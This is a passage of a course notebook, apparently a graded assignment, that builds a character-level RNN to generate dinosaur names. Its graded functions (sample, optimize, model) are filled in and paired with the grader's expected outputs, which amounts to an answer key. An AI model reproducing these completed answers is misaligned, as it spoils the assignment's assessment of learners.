"# Test with a maxvalue of 10\nmValue = 10\nnp.random.seed(3)\ndWax = np.random.randn(5,3)*10\ndWaa = np.random.randn(5,5)*10\ndWya = np.random.randn(2,5)*10\ndb = np.random.randn(5,1)*10\ndby = np.random.randn(2,1)*10\ngradients = {\"dWax\": dWax, \"dWaa\": dWaa, \"dWya\": dWya, \"db\": db, \"dby\": dby}\ngradients = clip(gradients, mValue)\nprint(\"gradients[\\\"dWaa\\\"][1][2] =\", gradients[\"dWaa\"][1][2])\nprint(\"gradients[\\\"dWax\\\"][3][1] =\", gradients[\"dWax\"][3][1])\nprint(\"gradients[\\\"dWya\\\"][1][2] =\", gradients[\"dWya\"][1][2])\nprint(\"gradients[\\\"db\\\"][4] =\", gradients[\"db\"][4])\nprint(\"gradients[\\\"dby\\\"][1] =\", gradients[\"dby\"][1])",
"gradients[\"dWaa\"][1][2] = 10.0\ngradients[\"dWax\"][3][1] = -10.0\ngradients[\"dWya\"][1][2] = 0.29713815361\ngradients[\"db\"][4] = [ 10.]\ngradients[\"dby\"][1] = [ 8.45833407]\n"
]
],
[
[
"** Expected output:**\n\n```Python\ngradients[\"dWaa\"][1][2] = 10.0\ngradients[\"dWax\"][3][1] = -10.0\ngradients[\"dWya\"][1][2] = 0.29713815361\ngradients[\"db\"][4] = [ 10.]\ngradients[\"dby\"][1] = [ 8.45833407]\n```",
"_____no_output_____"
]
],
[
[
"# Test with a maxValue of 5\nmValue = 5\nnp.random.seed(3)\ndWax = np.random.randn(5,3)*10\ndWaa = np.random.randn(5,5)*10\ndWya = np.random.randn(2,5)*10\ndb = np.random.randn(5,1)*10\ndby = np.random.randn(2,1)*10\ngradients = {\"dWax\": dWax, \"dWaa\": dWaa, \"dWya\": dWya, \"db\": db, \"dby\": dby}\ngradients = clip(gradients, mValue)\nprint(\"gradients[\\\"dWaa\\\"][1][2] =\", gradients[\"dWaa\"][1][2])\nprint(\"gradients[\\\"dWax\\\"][3][1] =\", gradients[\"dWax\"][3][1])\nprint(\"gradients[\\\"dWya\\\"][1][2] =\", gradients[\"dWya\"][1][2])\nprint(\"gradients[\\\"db\\\"][4] =\", gradients[\"db\"][4])\nprint(\"gradients[\\\"dby\\\"][1] =\", gradients[\"dby\"][1])\ndel mValue # avoid common issue",
"gradients[\"dWaa\"][1][2] = 5.0\ngradients[\"dWax\"][3][1] = -5.0\ngradients[\"dWya\"][1][2] = 0.29713815361\ngradients[\"db\"][4] = [ 5.]\ngradients[\"dby\"][1] = [ 5.]\n"
]
],
[
[
"** Expected Output: **\n```Python\ngradients[\"dWaa\"][1][2] = 5.0\ngradients[\"dWax\"][3][1] = -5.0\ngradients[\"dWya\"][1][2] = 0.29713815361\ngradients[\"db\"][4] = [ 5.]\ngradients[\"dby\"][1] = [ 5.]\n```",
"_____no_output_____"
],
[
"### 2.2 - Sampling\n\nNow assume that your model is trained. You would like to generate new text (characters). The process of generation is explained in the picture below:\n\n<img src=\"images/dinos3.png\" style=\"width:500;height:300px;\">\n<caption><center> **Figure 3**: In this picture, we assume the model is already trained. We pass in $x^{\\langle 1\\rangle} = \\vec{0}$ at the first time step, and have the network sample one character at a time. </center></caption>",
"_____no_output_____"
],
[
"**Exercise**: Implement the `sample` function below to sample characters. You need to carry out 4 steps:\n\n- **Step 1**: Input the \"dummy\" vector of zeros $x^{\\langle 1 \\rangle} = \\vec{0}$. \n - This is the default input before we've generated any characters. \n We also set $a^{\\langle 0 \\rangle} = \\vec{0}$",
"_____no_output_____"
],
[
"- **Step 2**: Run one step of forward propagation to get $a^{\\langle 1 \\rangle}$ and $\\hat{y}^{\\langle 1 \\rangle}$. Here are the equations:\n\nhidden state: \n$$ a^{\\langle t+1 \\rangle} = \\tanh(W_{ax} x^{\\langle t+1 \\rangle } + W_{aa} a^{\\langle t \\rangle } + b)\\tag{1}$$\n\nactivation:\n$$ z^{\\langle t + 1 \\rangle } = W_{ya} a^{\\langle t + 1 \\rangle } + b_y \\tag{2}$$\n\nprediction:\n$$ \\hat{y}^{\\langle t+1 \\rangle } = softmax(z^{\\langle t + 1 \\rangle })\\tag{3}$$\n\n- Details about $\\hat{y}^{\\langle t+1 \\rangle }$:\n - Note that $\\hat{y}^{\\langle t+1 \\rangle }$ is a (softmax) probability vector (its entries are between 0 and 1 and sum to 1). \n - $\\hat{y}^{\\langle t+1 \\rangle}_i$ represents the probability that the character indexed by \"i\" is the next character. \n - We have provided a `softmax()` function that you can use.",
"_____no_output_____"
],
[
"#### Additional Hints\n\n- $x^{\\langle 1 \\rangle}$ is `x` in the code. When creating the one-hot vector, make a numpy array of zeros, with the number of rows equal to the number of unique characters, and the number of columns equal to one. It's a 2D and not a 1D array.\n- $a^{\\langle 0 \\rangle}$ is `a_prev` in the code. It is a numpy array of zeros, where the number of rows is $n_{a}$, and number of columns is 1. It is a 2D array as well. $n_{a}$ is retrieved by getting the number of columns in $W_{aa}$ (the numbers need to match in order for the matrix multiplication $W_{aa}a^{\\langle t \\rangle}$ to work.\n- [numpy.dot](https://docs.scipy.org/doc/numpy/reference/generated/numpy.dot.html)\n- [numpy.tanh](https://docs.scipy.org/doc/numpy/reference/generated/numpy.tanh.html)",
"_____no_output_____"
],
[
"#### Using 2D arrays instead of 1D arrays\n* You may be wondering why we emphasize that $x^{\\langle 1 \\rangle}$ and $a^{\\langle 0 \\rangle}$ are 2D arrays and not 1D vectors.\n* For matrix multiplication in numpy, if we multiply a 2D matrix with a 1D vector, we end up with with a 1D array.\n* This becomes a problem when we add two arrays where we expected them to have the same shape.\n* When two arrays with a different number of dimensions are added together, Python \"broadcasts\" one across the other.\n* Here is some sample code that shows the difference between using a 1D and 2D array.",
"_____no_output_____"
]
],
[
[
"matrix1 = np.array([[1,1],[2,2],[3,3]]) # (3,2)\nmatrix2 = np.array([[0],[0],[0]]) # (3,1) \nvector1D = np.array([1,1]) # (2,) \nvector2D = np.array([[1],[1]]) # (2,1)\nprint(\"matrix1 \\n\", matrix1,\"\\n\")\nprint(\"matrix2 \\n\", matrix2,\"\\n\")\nprint(\"vector1D \\n\", vector1D,\"\\n\")\nprint(\"vector2D \\n\", vector2D)",
"matrix1 \n [[1 1]\n [2 2]\n [3 3]] \n\nmatrix2 \n [[0]\n [0]\n [0]] \n\nvector1D \n [1 1] \n\nvector2D \n [[1]\n [1]]\n"
],
[
"print(\"Multiply 2D and 1D arrays: result is a 1D array\\n\", \n np.dot(matrix1,vector1D))\nprint(\"Multiply 2D and 2D arrays: result is a 2D array\\n\", \n np.dot(matrix1,vector2D))",
"Multiply 2D and 1D arrays: result is a 1D array\n [2 4 6]\nMultiply 2D and 2D arrays: result is a 2D array\n [[2]\n [4]\n [6]]\n"
],
[
"print(\"Adding (3 x 1) vector to a (3 x 1) vector is a (3 x 1) vector\\n\",\n \"This is what we want here!\\n\", \n np.dot(matrix1,vector2D) + matrix2)",
"Adding (3 x 1) vector to a (3 x 1) vector is a (3 x 1) vector\n This is what we want here!\n [[2]\n [4]\n [6]]\n"
],
[
"print(\"Adding a (3,) vector to a (3 x 1) vector\\n\",\n \"broadcasts the 1D array across the second dimension\\n\",\n \"Not what we want here!\\n\",\n np.dot(matrix1,vector1D) + matrix2\n )",
"Adding a (3,) vector to a (3 x 1) vector\n broadcasts the 1D array across the second dimension\n Not what we want here!\n [[2 4 6]\n [2 4 6]\n [2 4 6]]\n"
]
],
[
[
"- **Step 3**: Sampling: \n - Now that we have $y^{\\langle t+1 \\rangle}$, we want to select the next letter in the dinosaur name. If we select the most probable, the model will always generate the same result given a starting letter. To make the results more interesting, we will use np.random.choice to select a next letter that is *likely*, but not always the same.\n - Pick the next character's **index** according to the probability distribution specified by $\\hat{y}^{\\langle t+1 \\rangle }$. \n - This means that if $\\hat{y}^{\\langle t+1 \\rangle }_i = 0.16$, you will pick the index \"i\" with 16% probability. \n - Use [np.random.choice](https://docs.scipy.org/doc/numpy-1.13.0/reference/generated/numpy.random.choice.html).\n\n Example of how to use `np.random.choice()`:\n ```python\n np.random.seed(0)\n probs = np.array([0.1, 0.0, 0.7, 0.2])\n idx = np.random.choice(range(len((probs)), p = probs)\n ```\n \n - This means that you will pick the index (`idx`) according to the distribution: \n\n $P(index = 0) = 0.1, P(index = 1) = 0.0, P(index = 2) = 0.7, P(index = 3) = 0.2$.\n\n - Note that the value that's set to `p` should be set to a 1D vector.\n - Also notice that $\\hat{y}^{\\langle t+1 \\rangle}$, which is `y` in the code, is a 2D array.\n - Also notice, while in your implementation, the first argument to np.random.choice is just an ordered list [0,1,.., vocab_len-1], it is *Not* appropriate to use char_to_ix.values(). The *order* of values returned by a python dictionary .values() call will be the same order as they are added to the dictionary. The grader may have a different order when it runs your routine than when you run it in your notebook.",
"_____no_output_____"
],
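[
"Here is a minimal, ungraded sketch of drawing an index from a probability vector; the numbers are made up, and `probs` is given the same column-vector shape that `y` has in the code:\n\n```python\nimport numpy as np\n\nnp.random.seed(0)\nprobs = np.array([[0.1], [0.0], [0.7], [0.2]])              # shape (4, 1), like y\nidx = np.random.choice(range(len(probs)), p=probs.ravel())  # ravel() flattens probs to 1D for p\nprint(idx)\n```",
"_____no_output_____"
],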
[
"##### Additional Hints\n- [range](https://docs.python.org/3/library/functions.html#func-range)\n- [numpy.ravel](https://docs.scipy.org/doc/numpy/reference/generated/numpy.ravel.html) takes a multi-dimensional array and returns its contents inside of a 1D vector.\n```Python\narr = np.array([[1,2],[3,4]])\nprint(\"arr\")\nprint(arr)\nprint(\"arr.ravel()\")\nprint(arr.ravel())\n```\nOutput:\n```Python\narr\n[[1 2]\n [3 4]]\narr.ravel()\n[1 2 3 4]\n```\n\n- Note that `append` is an \"in-place\" operation. In other words, don't do this:\n```Python\nfun_hobbies = fun_hobbies.append('learning') ## Doesn't give you what you want\n```",
"_____no_output_____"
],
[
"- **Step 4**: Update to $x^{\\langle t \\rangle }$ \n - The last step to implement in `sample()` is to update the variable `x`, which currently stores $x^{\\langle t \\rangle }$, with the value of $x^{\\langle t + 1 \\rangle }$. \n - You will represent $x^{\\langle t + 1 \\rangle }$ by creating a one-hot vector corresponding to the character that you have chosen as your prediction. \n - You will then forward propagate $x^{\\langle t + 1 \\rangle }$ in Step 1 and keep repeating the process until you get a \"\\n\" character, indicating that you have reached the end of the dinosaur name. ",
"_____no_output_____"
],
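[
"A minimal, ungraded sketch of the one-hot update described above; `vocab_size` and `idx` below are placeholder values:\n\n```python\nimport numpy as np\n\nvocab_size = 27\nidx = 3                          # index of the character sampled in Step 3\nx = np.zeros((vocab_size, 1))    # reset x to a column of zeros\nx[idx] = 1                       # one-hot vector for the sampled character\nprint(x[:5].ravel())             # [ 0.  0.  0.  1.  0.]\n```",
"_____no_output_____"
],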
[
"##### Additional Hints\n- In order to reset `x` before setting it to the new one-hot vector, you'll want to set all the values to zero.\n - You can either create a new numpy array: [numpy.zeros](https://docs.scipy.org/doc/numpy/reference/generated/numpy.zeros.html)\n - Or fill all values with a single number: [numpy.ndarray.fill](https://docs.scipy.org/doc/numpy/reference/generated/numpy.ndarray.fill.html)",
"_____no_output_____"
]
],
[
[
"# GRADED FUNCTION: sample\n\ndef sample(parameters, char_to_ix, seed):\n \"\"\"\n Sample a sequence of characters according to a sequence of probability distributions output of the RNN\n\n Arguments:\n parameters -- python dictionary containing the parameters Waa, Wax, Wya, by, and b. \n char_to_ix -- python dictionary mapping each character to an index.\n seed -- used for grading purposes. Do not worry about it.\n\n Returns:\n indices -- a list of length n containing the indices of the sampled characters.\n \"\"\"\n \n # Retrieve parameters and relevant shapes from \"parameters\" dictionary\n Waa, Wax, Wya, by, b = parameters['Waa'], parameters['Wax'], parameters['Wya'], parameters['by'], parameters['b']\n vocab_size = by.shape[0]\n n_a = Waa.shape[1]\n \n ### START CODE HERE ###\n # Step 1: Create the a zero vector x that can be used as the one-hot vector \n # representing the first character (initializing the sequence generation). (≈1 line)\n x = np.zeros(( vocab_size, 1))\n # Step 1': Initialize a_prev as zeros (≈1 line)\n a_prev = np.zeros(( n_a, 1))\n \n # Create an empty list of indices, this is the list which will contain the list of indices of the characters to generate (≈1 line)\n indices = []\n \n # idx is the index of the one-hot vector x that is set to 1\n # All other positions in x are zero.\n # We will initialize idx to -1\n idx = -1 \n \n # Loop over time-steps t. At each time-step:\n # sample a character from a probability distribution \n # and append its index (`idx`) to the list \"indices\". \n # We'll stop if we reach 50 characters \n # (which should be very unlikely with a well trained model).\n # Setting the maximum number of characters helps with debugging and prevents infinite loops. \n counter = 0\n newline_character = char_to_ix['\\n']\n \n while (idx != newline_character and counter != 50):\n \n # Step 2: Forward propagate x using the equations (1), (2) and (3)\n a = np.tanh( np.dot(Waa, a_prev) + np.dot(Wax, x) + b)\n z = np.dot(Wya, a) + by\n y = softmax(z)\n \n # for grading purposes\n np.random.seed(counter+seed) \n \n # Step 3: Sample the index of a character within the vocabulary from the probability distribution y\n # (see additional hints above)\n idx = np.random.choice(range(vocab_size), p = y.ravel())\n\n # Append the index to \"indices\"\n indices.append(idx)\n \n # Step 4: Overwrite the input x with one that corresponds to the sampled index `idx`.\n # (see additional hints above)\n x = np.zeros(( vocab_size, 1))\n x[idx,:] = 1\n \n # Update \"a_prev\" to be \"a\"\n a_prev = a\n \n # for grading purposes\n seed += 1\n counter +=1\n \n ### END CODE HERE ###\n\n if (counter == 50):\n indices.append(char_to_ix['\\n'])\n \n return indices",
"_____no_output_____"
],
[
"np.random.seed(2)\n_, n_a = 20, 100\nWax, Waa, Wya = np.random.randn(n_a, vocab_size), np.random.randn(n_a, n_a), np.random.randn(vocab_size, n_a)\nb, by = np.random.randn(n_a, 1), np.random.randn(vocab_size, 1)\nparameters = {\"Wax\": Wax, \"Waa\": Waa, \"Wya\": Wya, \"b\": b, \"by\": by}\n\n\nindices = sample(parameters, char_to_ix, 0)\nprint(\"Sampling:\")\nprint(\"list of sampled indices:\\n\", indices)\nprint(\"list of sampled characters:\\n\", [ix_to_char[i] for i in indices])",
"Sampling:\nlist of sampled indices:\n [12, 17, 24, 14, 13, 9, 10, 22, 24, 6, 13, 11, 12, 6, 21, 15, 21, 14, 3, 2, 1, 21, 18, 24, 7, 25, 6, 25, 18, 10, 16, 2, 3, 8, 15, 12, 11, 7, 1, 12, 10, 2, 7, 7, 11, 17, 24, 12, 13, 24, 0]\nlist of sampled characters:\n ['l', 'q', 'x', 'n', 'm', 'i', 'j', 'v', 'x', 'f', 'm', 'k', 'l', 'f', 'u', 'o', 'u', 'n', 'c', 'b', 'a', 'u', 'r', 'x', 'g', 'y', 'f', 'y', 'r', 'j', 'p', 'b', 'c', 'h', 'o', 'l', 'k', 'g', 'a', 'l', 'j', 'b', 'g', 'g', 'k', 'q', 'x', 'l', 'm', 'x', '\\n']\n"
]
],
[
[
"** Expected output:**\n\n```Python\nSampling:\nlist of sampled indices:\n [12, 17, 24, 14, 13, 9, 10, 22, 24, 6, 13, 11, 12, 6, 21, 15, 21, 14, 3, 2, 1, 21, 18, 24, 7, 25, 6, 25, 18, 10, 16, 2, 3, 8, 15, 12, 11, 7, 1, 12, 10, 2, 7, 7, 11, 17, 24, 12, 13, 24, 0]\nlist of sampled characters:\n ['l', 'q', 'x', 'n', 'm', 'i', 'j', 'v', 'x', 'f', 'm', 'k', 'l', 'f', 'u', 'o', 'u', 'n', 'c', 'b', 'a', 'u', 'r', 'x', 'g', 'y', 'f', 'y', 'r', 'j', 'p', 'b', 'c', 'h', 'o', 'l', 'k', 'g', 'a', 'l', 'j', 'b', 'g', 'g', 'k', 'q', 'x', 'l', 'm', 'x', '\\n']\n```\n",
"_____no_output_____"
],
[
"## 3 - Building the language model \n\nIt is time to build the character-level language model for text generation. \n\n\n### 3.1 - Gradient descent \n\n* In this section you will implement a function performing one step of stochastic gradient descent (with clipped gradients). \n* You will go through the training examples one at a time, so the optimization algorithm will be stochastic gradient descent. \n\nAs a reminder, here are the steps of a common optimization loop for an RNN:\n\n- Forward propagate through the RNN to compute the loss\n- Backward propagate through time to compute the gradients of the loss with respect to the parameters\n- Clip the gradients\n- Update the parameters using gradient descent \n\n**Exercise**: Implement the optimization process (one step of stochastic gradient descent). \n\nThe following functions are provided:\n\n```python\ndef rnn_forward(X, Y, a_prev, parameters):\n \"\"\" Performs the forward propagation through the RNN and computes the cross-entropy loss.\n It returns the loss' value as well as a \"cache\" storing values to be used in backpropagation.\"\"\"\n ....\n return loss, cache\n \ndef rnn_backward(X, Y, parameters, cache):\n \"\"\" Performs the backward propagation through time to compute the gradients of the loss with respect\n to the parameters. It returns also all the hidden states.\"\"\"\n ...\n return gradients, a\n\ndef update_parameters(parameters, gradients, learning_rate):\n \"\"\" Updates parameters using the Gradient Descent Update Rule.\"\"\"\n ...\n return parameters\n```\n\nRecall that you previously implemented the `clip` function:\n\n",
"_____no_output_____"
],
[
"#### parameters\n\n* Note that the weights and biases inside the `parameters` dictionary are being updated by the optimization, even though `parameters` is not one of the returned values of the `optimize` function. The `parameters` dictionary is passed by reference into the function, so changes to this dictionary are making changes to the `parameters` dictionary even when accessed outside of the function.\n* Python dictionaries and lists are \"pass by reference\", which means that if you pass a dictionary into a function and modify the dictionary within the function, this changes that same dictionary (it's not a copy of the dictionary).",
"_____no_output_____"
]
],
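[
[
"A quick, ungraded illustration of the pass-by-reference behavior described above (the dictionary and function below are made up for this example):\n\n```python\ndef add_one(d):\n    d['w'] = d['w'] + 1   # modifies the caller's dictionary in place\n\nparams = {'w': 0}\nadd_one(params)\nprint(params['w'])        # prints 1: the same dictionary object was updated\n```",
"_____no_output_____"
]
],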
[
[
"# GRADED FUNCTION: optimize\n\ndef optimize(X, Y, a_prev, parameters, learning_rate = 0.01):\n \"\"\"\n Execute one step of the optimization to train the model.\n \n Arguments:\n X -- list of integers, where each integer is a number that maps to a character in the vocabulary.\n Y -- list of integers, exactly the same as X but shifted one index to the left.\n a_prev -- previous hidden state.\n parameters -- python dictionary containing:\n Wax -- Weight matrix multiplying the input, numpy array of shape (n_a, n_x)\n Waa -- Weight matrix multiplying the hidden state, numpy array of shape (n_a, n_a)\n Wya -- Weight matrix relating the hidden-state to the output, numpy array of shape (n_y, n_a)\n b -- Bias, numpy array of shape (n_a, 1)\n by -- Bias relating the hidden-state to the output, numpy array of shape (n_y, 1)\n learning_rate -- learning rate for the model.\n \n Returns:\n loss -- value of the loss function (cross-entropy)\n gradients -- python dictionary containing:\n dWax -- Gradients of input-to-hidden weights, of shape (n_a, n_x)\n dWaa -- Gradients of hidden-to-hidden weights, of shape (n_a, n_a)\n dWya -- Gradients of hidden-to-output weights, of shape (n_y, n_a)\n db -- Gradients of bias vector, of shape (n_a, 1)\n dby -- Gradients of output bias vector, of shape (n_y, 1)\n a[len(X)-1] -- the last hidden state, of shape (n_a, 1)\n \"\"\"\n \n ### START CODE HERE ###\n \n # Forward propagate through time (≈1 line)\n loss, cache = rnn_forward(X, Y, a_prev, parameters)\n \n # Backpropagate through time (≈1 line)\n gradients, a = rnn_backward(X, Y, parameters, cache)\n \n # Clip your gradients between -5 (min) and 5 (max) (≈1 line)\n gradients = clip(gradients, 5)\n \n # Update parameters (≈1 line)\n parameters = update_parameters(parameters, gradients, learning_rate)\n \n ### END CODE HERE ###\n \n return loss, gradients, a[len(X)-1]",
"_____no_output_____"
],
[
"np.random.seed(1)\nvocab_size, n_a = 27, 100\na_prev = np.random.randn(n_a, 1)\nWax, Waa, Wya = np.random.randn(n_a, vocab_size), np.random.randn(n_a, n_a), np.random.randn(vocab_size, n_a)\nb, by = np.random.randn(n_a, 1), np.random.randn(vocab_size, 1)\nparameters = {\"Wax\": Wax, \"Waa\": Waa, \"Wya\": Wya, \"b\": b, \"by\": by}\nX = [12,3,5,11,22,3]\nY = [4,14,11,22,25, 26]\n\nloss, gradients, a_last = optimize(X, Y, a_prev, parameters, learning_rate = 0.01)\nprint(\"Loss =\", loss)\nprint(\"gradients[\\\"dWaa\\\"][1][2] =\", gradients[\"dWaa\"][1][2])\nprint(\"np.argmax(gradients[\\\"dWax\\\"]) =\", np.argmax(gradients[\"dWax\"]))\nprint(\"gradients[\\\"dWya\\\"][1][2] =\", gradients[\"dWya\"][1][2])\nprint(\"gradients[\\\"db\\\"][4] =\", gradients[\"db\"][4])\nprint(\"gradients[\\\"dby\\\"][1] =\", gradients[\"dby\"][1])\nprint(\"a_last[4] =\", a_last[4])",
"Loss = 126.503975722\ngradients[\"dWaa\"][1][2] = 0.194709315347\nnp.argmax(gradients[\"dWax\"]) = 93\ngradients[\"dWya\"][1][2] = -0.007773876032\ngradients[\"db\"][4] = [-0.06809825]\ngradients[\"dby\"][1] = [ 0.01538192]\na_last[4] = [-1.]\n"
]
],
[
[
"** Expected output:**\n\n```Python\nLoss = 126.503975722\ngradients[\"dWaa\"][1][2] = 0.194709315347\nnp.argmax(gradients[\"dWax\"]) = 93\ngradients[\"dWya\"][1][2] = -0.007773876032\ngradients[\"db\"][4] = [-0.06809825]\ngradients[\"dby\"][1] = [ 0.01538192]\na_last[4] = [-1.]\n```",
"_____no_output_____"
],
[
"### 3.2 - Training the model ",
"_____no_output_____"
],
[
"* Given the dataset of dinosaur names, we use each line of the dataset (one name) as one training example. \n* Every 2000 steps of stochastic gradient descent, you will sample several randomly chosen names to see how the algorithm is doing. \n \n\n**Exercise**: Follow the instructions and implement `model()`. When `examples[index]` contains one dinosaur name (string), to create an example (X, Y), you can use this:\n\n##### Set the index `idx` into the list of examples\n* Using the for-loop, walk through the shuffled list of dinosaur names in the list \"examples\".\n* For example, if there are n_e examples, and the for-loop increments the index to n_e onwards, think of how you would make the index cycle back to 0, so that we can continue feeding the examples into the model when j is n_e, n_e + 1, etc.\n* Hint: n_e + 1 divided by n_e is zero with a remainder of 1.\n* `%` is the modulus operator in python.\n\n##### Extract a single example from the list of examples\n* `single_example`: use the `idx` index that you set previously to get one word from the list of examples.",
"_____no_output_____"
],
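[
"For example (an illustration only, not part of the graded solution), the modulus operator makes the index wrap back to 0 once `j` reaches the number of examples:\n\n```python\n# With n_e = 3 examples, idx cycles 0, 1, 2, 0, 1, 2, 0, ...\nn_e = 3\nfor j in range(7):\n    print(j, j % n_e)\n```",
"_____no_output_____"
],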
[
"##### Convert a string into a list of characters: `single_example_chars`\n* `single_example_chars`: A string is a list of characters.\n* You can use a list comprehension (recommended over for-loops) to generate a list of characters.\n```Python\nstr = 'I love learning'\nlist_of_chars = [c for c in str]\nprint(list_of_chars)\n```\n\n```\n['I', ' ', 'l', 'o', 'v', 'e', ' ', 'l', 'e', 'a', 'r', 'n', 'i', 'n', 'g']\n```",
"_____no_output_____"
],
[
"##### Convert list of characters to a list of integers: `single_example_ix`\n* Create a list that contains the index numbers associated with each character.\n* Use the dictionary `char_to_ix`\n* You can combine this with the list comprehension that is used to get a list of characters from a string.",
"_____no_output_____"
],
[
"##### Create the list of input characters: `X`\n* `rnn_forward` uses the **`None`** value as a flag to set the input vector as a zero-vector.\n* Prepend the list [**`None`**] in front of the list of input characters.\n* There is more than one way to prepend a value to a list. One way is to add two lists together: `['a'] + ['b']`",
"_____no_output_____"
],
[
"##### Get the integer representation of the newline character `ix_newline`\n* `ix_newline`: The newline character signals the end of the dinosaur name.\n - get the integer representation of the newline character `'\\n'`.\n - Use `char_to_ix`",
"_____no_output_____"
],
[
"##### Set the list of labels (integer representation of the characters): `Y`\n* The goal is to train the RNN to predict the next letter in the name, so the labels are the list of characters that are one time step ahead of the characters in the input `X`.\n - For example, `Y[0]` contains the same value as `X[1]` \n* The RNN should predict a newline at the last letter so add ix_newline to the end of the labels. \n - Append the integer representation of the newline character to the end of `Y`.\n - Note that `append` is an in-place operation.\n - It might be easier for you to add two lists together.",
"_____no_output_____"
]
],
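[
[
"As a small sanity check (an illustration with made-up indices, not part of the graded solution), the relationship between `X` and `Y` looks like this:\n\n```python\n# Hypothetical 3-character name whose character indices are 20, 21, 18\nix_newline = 0\nX = [None, 20, 21, 18]\nY = X[1:] + [ix_newline]   # [20, 21, 18, 0] -- shifted one step left, newline index appended\n```",
"_____no_output_____"
]
],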
[
[
"# GRADED FUNCTION: model\n\ndef model(data, ix_to_char, char_to_ix, num_iterations = 35000, n_a = 50, dino_names = 7, vocab_size = 27, verbose = False):\n \"\"\"\n Trains the model and generates dinosaur names. \n \n Arguments:\n data -- text corpus\n ix_to_char -- dictionary that maps the index to a character\n char_to_ix -- dictionary that maps a character to an index\n num_iterations -- number of iterations to train the model for\n n_a -- number of units of the RNN cell\n dino_names -- number of dinosaur names you want to sample at each iteration. \n vocab_size -- number of unique characters found in the text (size of the vocabulary)\n \n Returns:\n parameters -- learned parameters\n \"\"\"\n \n # Retrieve n_x and n_y from vocab_size\n n_x, n_y = vocab_size, vocab_size\n \n # Initialize parameters\n parameters = initialize_parameters(n_a, n_x, n_y)\n \n # Initialize loss (this is required because we want to smooth our loss)\n loss = get_initial_loss(vocab_size, dino_names)\n \n # Build list of all dinosaur names (training examples).\n with open(\"dinos.txt\") as f:\n examples = f.readlines()\n examples = [x.lower().strip() for x in examples]\n \n # Shuffle list of all dinosaur names\n np.random.seed(0)\n np.random.shuffle(examples)\n \n # Initialize the hidden state of your LSTM\n a_prev = np.zeros((n_a, 1))\n \n # Optimization loop\n for j in range(num_iterations):\n \n ### START CODE HERE ###\n \n # Set the index `idx` (see instructions above)\n idx = j % len(examples)\n \n # Set the input X (see instructions above)\n single_example = examples[idx]\n single_example_chars = [c for c in single_example]\n single_example_ix = [char_to_ix[c] for c in single_example_chars]\n X = [None]+[single_example_ix]\n X = [None]+[char_to_ix[ch] for ch in examples[idx]]; \n # Set the labels Y (see instructions above)\n ix_newline = char_to_ix[\"\\n\"]\n Y = X[1:]+[ix_newline]\n\n # Perform one optimization step: Forward-prop -> Backward-prop -> Clip -> Update parameters\n # Choose a learning rate of 0.01\n curr_loss, gradients, a_prev = optimize(X, Y, a_prev, parameters, learning_rate=0.01)\n \n ### END CODE HERE ###\n \n # debug statements to aid in correctly forming X, Y\n if verbose and j in [0, len(examples) -1, len(examples)]:\n print(\"j = \" , j, \"idx = \", idx,) \n if verbose and j in [0]:\n print(\"single_example =\", single_example)\n print(\"single_example_chars\", single_example_chars)\n print(\"single_example_ix\", single_example_ix)\n print(\" X = \", X, \"\\n\", \"Y = \", Y, \"\\n\")\n \n # Use a latency trick to keep the loss smooth. It happens here to accelerate the training.\n loss = smooth(loss, curr_loss)\n\n # Every 2000 Iteration, generate \"n\" characters thanks to sample() to check if the model is learning properly\n if j % 2000 == 0:\n \n print('Iteration: %d, Loss: %f' % (j, loss) + '\\n')\n \n # The number of dinosaur names to print\n seed = 0\n for name in range(dino_names):\n \n # Sample indices and print them\n sampled_indices = sample(parameters, char_to_ix, seed)\n print_sample(sampled_indices, ix_to_char)\n \n seed += 1 # To get the same result (for grading purposes), increment the seed by one. \n \n print('\\n')\n \n return parameters",
"_____no_output_____"
]
],
[
[
"Run the following cell, you should observe your model outputting random-looking characters at the first iteration. After a few thousand iterations, your model should learn to generate reasonable-looking names. ",
"_____no_output_____"
]
],
[
[
"parameters = model(data, ix_to_char, char_to_ix, verbose = True)",
"j = 0 idx = 0\nsingle_example = turiasaurus\nsingle_example_chars ['t', 'u', 'r', 'i', 'a', 's', 'a', 'u', 'r', 'u', 's']\nsingle_example_ix [20, 21, 18, 9, 1, 19, 1, 21, 18, 21, 19]\n X = [None, 20, 21, 18, 9, 1, 19, 1, 21, 18, 21, 19] \n Y = [20, 21, 18, 9, 1, 19, 1, 21, 18, 21, 19, 0] \n\nIteration: 0, Loss: 23.087336\n\nNkzxwtdmfqoeyhsqwasjkjvu\nKneb\nKzxwtdmfqoeyhsqwasjkjvu\nNeb\nZxwtdmfqoeyhsqwasjkjvu\nEb\nXwtdmfqoeyhsqwasjkjvu\n\n\nj = 1535 idx = 1535\nj = 1536 idx = 0\nIteration: 2000, Loss: 27.884160\n\nLiusskeomnolxeros\nHmdaairus\nHytroligoraurus\nLecalosapaus\nXusicikoraurus\nAbalpsamantisaurus\nTpraneronxeros\n\n\nIteration: 4000, Loss: 25.901815\n\nMivrosaurus\nInee\nIvtroplisaurus\nMbaaisaurus\nWusichisaurus\nCabaselachus\nToraperlethosdarenitochusthiamamumamaon\n\n\nIteration: 6000, Loss: 24.608779\n\nOnwusceomosaurus\nLieeaerosaurus\nLxussaurus\nOma\nXusteonosaurus\nEeahosaurus\nToreonosaurus\n\n\nIteration: 8000, Loss: 24.070350\n\nOnxusichepriuon\nKilabersaurus\nLutrodon\nOmaaerosaurus\nXutrcheps\nEdaksoje\nTrodiktonus\n\n\nIteration: 10000, Loss: 23.844446\n\nOnyusaurus\nKlecalosaurus\nLustodon\nOla\nXusodonia\nEeaeosaurus\nTroceosaurus\n\n\nIteration: 12000, Loss: 23.291971\n\nOnyxosaurus\nKica\nLustrepiosaurus\nOlaagrraiansaurus\nYuspangosaurus\nEealosaurus\nTrognesaurus\n\n\nIteration: 14000, Loss: 23.382338\n\nMeutromodromurus\nInda\nIutroinatorsaurus\nMaca\nYusteratoptititan\nCa\nTroclosaurus\n\n\nIteration: 16000, Loss: 23.255630\n\nMeustolkanolus\nIndabestacarospceryradwalosaurus\nJustolopinaveraterasauracoptelalenyden\nMaca\nYusocles\nDaahosaurus\nTrodon\n\n\nIteration: 18000, Loss: 22.905483\n\nPhytronn\nMeicanstolanthus\nMustrisaurus\nPegalosaurus\nYuskercis\nEgalosaurus\nTromelosaurus\n\n\nIteration: 20000, Loss: 22.873854\n\nNlyushanerohyisaurus\nLoga\nLustrhigosaurus\nNedalosaurus\nYuslangosaurus\nElagosaurus\nTrrangosaurus\n\n\nIteration: 22000, Loss: 22.710545\n\nOnyxromicoraurospareiosatrus\nLiga\nMustoffankeugoptardoros\nOla\nYusodogongterosaurus\nEhaerona\nTrododongxernochenhus\n\n\nIteration: 24000, Loss: 